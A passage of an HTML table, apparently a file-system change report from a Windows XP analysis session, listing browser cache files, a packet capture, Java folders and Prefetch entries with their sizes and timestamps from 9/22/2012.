<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEF3BT4</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEOTJ4L</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAVO38L3</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\screenshot[2].jpg</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">37KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA0Y1H1G</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA2KHYDQ</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA6GXH8C</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\search[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">76KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:16 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\CAKLU50N.HTM</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:00 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\dnsd[1].css</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\help_16[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\qsonhs[1].aspx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\redir_not_found[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">6KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\report[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">111KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:56 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA0R10DS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA9YH18O</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCAVXGZO1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:09 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA6QGIGC</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA9XHX7I</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAAK6LMZ</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAB0WC2R</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAVTOWF0</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAYG9PUT</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\tabswelcome[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">15KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\close_nor[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">3KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\collapse_nor[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">3KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\expand_nor[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">3KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\google_com[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">109KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:02 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\main[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">93KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\NewTabPageScripts[2]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\report[2].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">507KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCA3FAUVH</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCABOLW00</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCANL4B03</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2HS76W</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2PPY3O</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCAGLGZBP</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[10]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[11]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\ua[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:42 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\urlquery_net[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">41KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:40 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\728x90-1[1].gif</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">76KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\banner-fade[1].gif</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\domainmap[1].gif</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">34KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\home[1].aspx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">57KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:47 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\il[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:42 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\jp[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:42 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCA9X3PTW</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:13 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCAVC54LS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\screenshot[2].jpg</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">160KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAOZA5VK</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:13 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAQVDE8Y</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAUMFERF</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[10]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[11]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\top[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\My Documents\pcap.pcapng</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1,026KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:32:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Sun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Sun\Java</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Sun\Java\Deployment</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\DUMPCAP.EXE-241FFA5D.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">37KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\JAVA.EXE-0C263507.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">71KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:01 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\JAVAWS.EXE-021AC9A9.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">12KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:19 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\JUCHECK.EXE-1B0E4D0A.pf</span></td>
<td></td>
